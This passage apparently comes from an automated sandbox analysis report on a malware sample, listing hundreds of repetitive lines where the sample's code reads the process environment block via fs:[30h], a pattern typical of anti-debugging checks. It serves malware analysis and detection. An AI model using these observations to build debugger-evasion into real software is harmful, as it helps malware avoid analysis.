      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3798D5B0 mov eax, dword ptr fs:[00000030h]6_2_3798D5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115A9 mov eax, dword ptr fs:[00000030h]6_2_379115A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115A9 mov eax, dword ptr fs:[00000030h]6_2_379115A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115A9 mov eax, dword ptr fs:[00000030h]6_2_379115A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115A9 mov eax, dword ptr fs:[00000030h]6_2_379115A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115A9 mov eax, dword ptr fs:[00000030h]6_2_379115A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3796D5D0 mov eax, dword ptr fs:[00000030h]6_2_3796D5D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3796D5D0 mov ecx, dword ptr fs:[00000030h]6_2_3796D5D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C35D7 mov eax, dword ptr fs:[00000030h]6_2_379C35D7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C35D7 mov eax, dword ptr fs:[00000030h]6_2_379C35D7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C35D7 mov eax, dword ptr fs:[00000030h]6_2_379C35D7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379195DA mov eax, dword ptr fs:[00000030h]6_2_379195DA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379255C0 mov eax, dword ptr fs:[00000030h]6_2_379255C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C55C9 mov eax, dword ptr fs:[00000030h]6_2_379C55C9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115F4 mov eax, dword ptr fs:[00000030h]6_2_379115F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115F4 mov eax, dword ptr fs:[00000030h]6_2_379115F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115F4 mov eax, dword ptr fs:[00000030h]6_2_379115F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115F4 mov eax, dword ptr fs:[00000030h]6_2_379115F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115F4 mov eax, dword ptr fs:[00000030h]6_2_379115F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379115F4 mov eax, dword ptr fs:[00000030h]6_2_379115F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37927505 mov eax, dword ptr fs:[00000030h]6_2_37927505
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37927505 mov ecx, dword ptr fs:[00000030h]6_2_37927505
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792D530 mov eax, dword ptr fs:[00000030h]6_2_3792D530
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792D530 mov eax, dword ptr fs:[00000030h]6_2_3792D530
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C5537 mov eax, dword ptr fs:[00000030h]6_2_379C5537
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AB52F mov eax, dword ptr fs:[00000030h]6_2_379AB52F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FD534 mov eax, dword ptr fs:[00000030h]6_2_378FD534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FD534 mov eax, dword ptr fs:[00000030h]6_2_378FD534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FD534 mov eax, dword ptr fs:[00000030h]6_2_378FD534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FD534 mov eax, dword ptr fs:[00000030h]6_2_378FD534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FD534 mov eax, dword ptr fs:[00000030h]6_2_378FD534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FD534 mov eax, dword ptr fs:[00000030h]6_2_378FD534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799F525 mov eax, dword ptr fs:[00000030h]6_2_3799F525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799F525 mov eax, dword ptr fs:[00000030h]6_2_3799F525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799F525 mov eax, dword ptr fs:[00000030h]6_2_3799F525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799F525 mov eax, dword ptr fs:[00000030h]6_2_3799F525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799F525 mov eax, dword ptr fs:[00000030h]6_2_3799F525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799F525 mov eax, dword ptr fs:[00000030h]6_2_3799F525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799F525 mov eax, dword ptr fs:[00000030h]6_2_3799F525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799B550 mov eax, dword ptr fs:[00000030h]6_2_3799B550
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799B550 mov eax, dword ptr fs:[00000030h]6_2_3799B550
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799B550 mov eax, dword ptr fs:[00000030h]6_2_3799B550
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792B570 mov eax, dword ptr fs:[00000030h]6_2_3792B570
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792B570 mov eax, dword ptr fs:[00000030h]6_2_3792B570
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB562 mov eax, dword ptr fs:[00000030h]6_2_378EB562
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F9486 mov eax, dword ptr fs:[00000030h]6_2_378F9486
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F9486 mov eax, dword ptr fs:[00000030h]6_2_378F9486
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB480 mov eax, dword ptr fs:[00000030h]6_2_378EB480
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379234B0 mov eax, dword ptr fs:[00000030h]6_2_379234B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E74B0 mov eax, dword ptr fs:[00000030h]6_2_378E74B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E74B0 mov eax, dword ptr fs:[00000030h]6_2_378E74B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C54DB mov eax, dword ptr fs:[00000030h]6_2_379C54DB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379994E0 mov eax, dword ptr fs:[00000030h]6_2_379994E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37977410 mov eax, dword ptr fs:[00000030h]6_2_37977410
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791340D mov eax, dword ptr fs:[00000030h]6_2_3791340D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AF453 mov eax, dword ptr fs:[00000030h]6_2_379AF453
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799B450 mov eax, dword ptr fs:[00000030h]6_2_3799B450
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799B450 mov eax, dword ptr fs:[00000030h]6_2_3799B450
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799B450 mov eax, dword ptr fs:[00000030h]6_2_3799B450
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799B450 mov eax, dword ptr fs:[00000030h]6_2_3799B450
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB440 mov eax, dword ptr fs:[00000030h]6_2_378FB440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB440 mov eax, dword ptr fs:[00000030h]6_2_378FB440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB440 mov eax, dword ptr fs:[00000030h]6_2_378FB440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB440 mov eax, dword ptr fs:[00000030h]6_2_378FB440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB440 mov eax, dword ptr fs:[00000030h]6_2_378FB440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB440 mov eax, dword ptr fs:[00000030h]6_2_378FB440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C547F mov eax, dword ptr fs:[00000030h]6_2_379C547F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1460 mov eax, dword ptr fs:[00000030h]6_2_378F1460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1460 mov eax, dword ptr fs:[00000030h]6_2_378F1460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1460 mov eax, dword ptr fs:[00000030h]6_2_378F1460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1460 mov eax, dword ptr fs:[00000030h]6_2_378F1460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1460 mov eax, dword ptr fs:[00000030h]6_2_378F1460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790F460 mov eax, dword ptr fs:[00000030h]6_2_3790F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790F460 mov eax, dword ptr fs:[00000030h]6_2_3790F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790F460 mov eax, dword ptr fs:[00000030h]6_2_3790F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790F460 mov eax, dword ptr fs:[00000030h]6_2_3790F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790F460 mov eax, dword ptr fs:[00000030h]6_2_3790F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790F460 mov eax, dword ptr fs:[00000030h]6_2_3790F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C539D mov eax, dword ptr fs:[00000030h]6_2_379C539D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3794739A mov eax, dword ptr fs:[00000030h]6_2_3794739A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3794739A mov eax, dword ptr fs:[00000030h]6_2_3794739A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379913B9 mov eax, dword ptr fs:[00000030h]6_2_379913B9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379913B9 mov eax, dword ptr fs:[00000030h]6_2_379913B9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379913B9 mov eax, dword ptr fs:[00000030h]6_2_379913B9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379233A0 mov eax, dword ptr fs:[00000030h]6_2_379233A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379233A0 mov eax, dword ptr fs:[00000030h]6_2_379233A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379133A5 mov eax, dword ptr fs:[00000030h]6_2_379133A5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AB3D0 mov ecx, dword ptr fs:[00000030h]6_2_379AB3D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C53FC mov eax, dword ptr fs:[00000030h]6_2_379C53FC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AF3E6 mov eax, dword ptr fs:[00000030h]6_2_379AF3E6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797930B mov eax, dword ptr fs:[00000030h]6_2_3797930B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797930B mov eax, dword ptr fs:[00000030h]6_2_3797930B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797930B mov eax, dword ptr fs:[00000030h]6_2_3797930B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B132D mov eax, dword ptr fs:[00000030h]6_2_379B132D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B132D mov eax, dword ptr fs:[00000030h]6_2_379B132D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F32A mov eax, dword ptr fs:[00000030h]6_2_3791F32A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E7330 mov eax, dword ptr fs:[00000030h]6_2_378E7330
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378ED34C mov eax, dword ptr fs:[00000030h]6_2_378ED34C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378ED34C mov eax, dword ptr fs:[00000030h]6_2_378ED34C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C5341 mov eax, dword ptr fs:[00000030h]6_2_379C5341
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9353 mov eax, dword ptr fs:[00000030h]6_2_378E9353
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9353 mov eax, dword ptr fs:[00000030h]6_2_378E9353
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37993370 mov eax, dword ptr fs:[00000030h]6_2_37993370
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AF367 mov eax, dword ptr fs:[00000030h]6_2_379AF367
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F7370 mov eax, dword ptr fs:[00000030h]6_2_378F7370
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F7370 mov eax, dword ptr fs:[00000030h]6_2_378F7370
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F7370 mov eax, dword ptr fs:[00000030h]6_2_378F7370
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792329E mov eax, dword ptr fs:[00000030h]6_2_3792329E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792329E mov eax, dword ptr fs:[00000030h]6_2_3792329E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C5283 mov eax, dword ptr fs:[00000030h]6_2_379C5283
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379792BC mov eax, dword ptr fs:[00000030h]6_2_379792BC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379792BC mov eax, dword ptr fs:[00000030h]6_2_379792BC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379792BC mov ecx, dword ptr fs:[00000030h]6_2_379792BC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379792BC mov ecx, dword ptr fs:[00000030h]6_2_379792BC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379052A0 mov eax, dword ptr fs:[00000030h]6_2_379052A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379052A0 mov eax, dword ptr fs:[00000030h]6_2_379052A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379052A0 mov eax, dword ptr fs:[00000030h]6_2_379052A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379052A0 mov eax, dword ptr fs:[00000030h]6_2_379052A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379872A0 mov eax, dword ptr fs:[00000030h]6_2_379872A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379872A0 mov eax, dword ptr fs:[00000030h]6_2_379872A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B92A6 mov eax, dword ptr fs:[00000030h]6_2_379B92A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B92A6 mov eax, dword ptr fs:[00000030h]6_2_379B92A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B92A6 mov eax, dword ptr fs:[00000030h]6_2_379B92A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B92A6 mov eax, dword ptr fs:[00000030h]6_2_379B92A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F2D0 mov eax, dword ptr fs:[00000030h]6_2_3791F2D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F2D0 mov eax, dword ptr fs:[00000030h]6_2_3791F2D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F92C5 mov eax, dword ptr fs:[00000030h]6_2_378F92C5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F92C5 mov eax, dword ptr fs:[00000030h]6_2_378F92C5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B2C0 mov eax, dword ptr fs:[00000030h]6_2_3791B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B2C0 mov eax, dword ptr fs:[00000030h]6_2_3791B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B2C0 mov eax, dword ptr fs:[00000030h]6_2_3791B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B2C0 mov eax, dword ptr fs:[00000030h]6_2_3791B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B2C0 mov eax, dword ptr fs:[00000030h]6_2_3791B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B2C0 mov eax, dword ptr fs:[00000030h]6_2_3791B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B2C0 mov eax, dword ptr fs:[00000030h]6_2_3791B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB2D3 mov eax, dword ptr fs:[00000030h]6_2_378EB2D3
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB2D3 mov eax, dword ptr fs:[00000030h]6_2_378EB2D3
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB2D3 mov eax, dword ptr fs:[00000030h]6_2_378EB2D3
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AF2F8 mov eax, dword ptr fs:[00000030h]6_2_379AF2F8
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799B2F0 mov eax, dword ptr fs:[00000030h]6_2_3799B2F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799B2F0 mov eax, dword ptr fs:[00000030h]6_2_3799B2F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E92FF mov eax, dword ptr fs:[00000030h]6_2_378E92FF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED mov eax, dword ptr fs:[00000030h]6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C52E2 mov eax, dword ptr fs:[00000030h]6_2_379C52E2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37927208 mov eax, dword ptr fs:[00000030h]6_2_37927208
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37927208 mov eax, dword ptr fs:[00000030h]6_2_37927208
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C5227 mov eax, dword ptr fs:[00000030h]6_2_379C5227
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797D250 mov ecx, dword ptr fs:[00000030h]6_2_3797D250
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AB256 mov eax, dword ptr fs:[00000030h]6_2_379AB256
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AB256 mov eax, dword ptr fs:[00000030h]6_2_379AB256
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9240 mov eax, dword ptr fs:[00000030h]6_2_378E9240
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9240 mov eax, dword ptr fs:[00000030h]6_2_378E9240
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792724D mov eax, dword ptr fs:[00000030h]6_2_3792724D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37931270 mov eax, dword ptr fs:[00000030h]6_2_37931270
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37931270 mov eax, dword ptr fs:[00000030h]6_2_37931270
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37919274 mov eax, dword ptr fs:[00000030h]6_2_37919274
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BD26B mov eax, dword ptr fs:[00000030h]6_2_379BD26B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BD26B mov eax, dword ptr fs:[00000030h]6_2_379BD26B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37947190 mov eax, dword ptr fs:[00000030h]6_2_37947190
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A5180 mov eax, dword ptr fs:[00000030h]6_2_379A5180
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A5180 mov eax, dword ptr fs:[00000030h]6_2_379A5180
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790B1B0 mov eax, dword ptr fs:[00000030h]6_2_3790B1B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A11A4 mov eax, dword ptr fs:[00000030h]6_2_379A11A4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A11A4 mov eax, dword ptr fs:[00000030h]6_2_379A11A4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A11A4 mov eax, dword ptr fs:[00000030h]6_2_379A11A4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A11A4 mov eax, dword ptr fs:[00000030h]6_2_379A11A4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792D1D0 mov eax, dword ptr fs:[00000030h]6_2_3792D1D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792D1D0 mov ecx, dword ptr fs:[00000030h]6_2_3792D1D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C51CB mov eax, dword ptr fs:[00000030h]6_2_379C51CB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379971F9 mov esi, dword ptr fs:[00000030h]6_2_379971F9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F51ED mov eax, dword ptr fs:[00000030h]6_2_378F51ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379151EF mov eax, dword ptr fs:[00000030h]6_2_379151EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB136 mov eax, dword ptr fs:[00000030h]6_2_378EB136
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB136 mov eax, dword ptr fs:[00000030h]6_2_378EB136
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB136 mov eax, dword ptr fs:[00000030h]6_2_378EB136
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB136 mov eax, dword ptr fs:[00000030h]6_2_378EB136
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1131 mov eax, dword ptr fs:[00000030h]6_2_378F1131
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F1131 mov eax, dword ptr fs:[00000030h]6_2_378F1131
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9148 mov eax, dword ptr fs:[00000030h]6_2_378E9148
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9148 mov eax, dword ptr fs:[00000030h]6_2_378E9148
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9148 mov eax, dword ptr fs:[00000030h]6_2_378E9148
